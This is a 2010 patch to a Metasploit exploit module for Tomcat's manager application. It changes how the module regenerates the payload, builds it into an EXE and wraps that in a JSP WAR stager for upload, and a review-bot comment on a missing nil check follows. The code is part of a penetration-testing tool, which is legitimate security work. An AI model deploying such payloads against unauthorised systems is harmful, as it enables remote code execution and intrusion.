From b49e81300ae38d06af8218c8d5cd56f5ecafbf14 Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Thu, 14 Oct 2010 21:26:05 +0000
Subject: [PATCH] fix auto-target exe generation

git-svn-id: file:///home/svn/framework3/trunk@10688 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/multi/http/tomcat_mgr_deploy.rb | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index 885b2ca955..a217a570b5 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -179,18 +179,30 @@ class Metasploit3 < Msf::Exploit::Remote
  raise RuntimeError, "Unable to automatically select a target"
  end
  print_status("Automatically selected target \"#{mytarget.name}\"")
+
+ # We must regenerate the payload in case our auto-magic changed something.
+ p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
  else
  print_status("Using manually select target \"#{mytarget.name}\"")
+ p = payload
  end
 
  # Generate the WAR containing the EXE containing the payload
  jsp_name = rand_text_alphanumeric(4+rand(32-4))
- exe = generate_payload_exe
- war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
-
  app_base = rand_text_alphanumeric(4+rand(32-4))
  query_str = "?path=/" + app_base
 
+ # Generate an EXE from the payload
+ exe = generate_payload_exe(
+ {
+ :code => p.encoded,
+ :arch => mytarget.arch,
+ :platform => mytarget.platform
+ })
+
+ # Encapsulate it in a WAR stager
+ war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
+
  #
  # UPLOAD
  #
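Review bot: The value returned by `exploit_regenerate_payload(mytarget.platform, mytarget.arch)` is used a few lines later as `p.encoded` without any check. That helper's definition is not visible in this hunk, but if it can return nil for an incompatible platform/arch, the module would stop with a NoMethodError instead of a readable message. A guard directly after the call, in the style of the existing error above it, would cover this: `raise RuntimeError, "Unable to regenerate the payload for the selected target" unless p`. Separately, the local `p` shadows `Kernel#p` for the rest of the method and does not say what it holds; a name such as `regenerated_payload` would read better at `:code => p.encoded`. The enclosing method starts and ends outside the hunk.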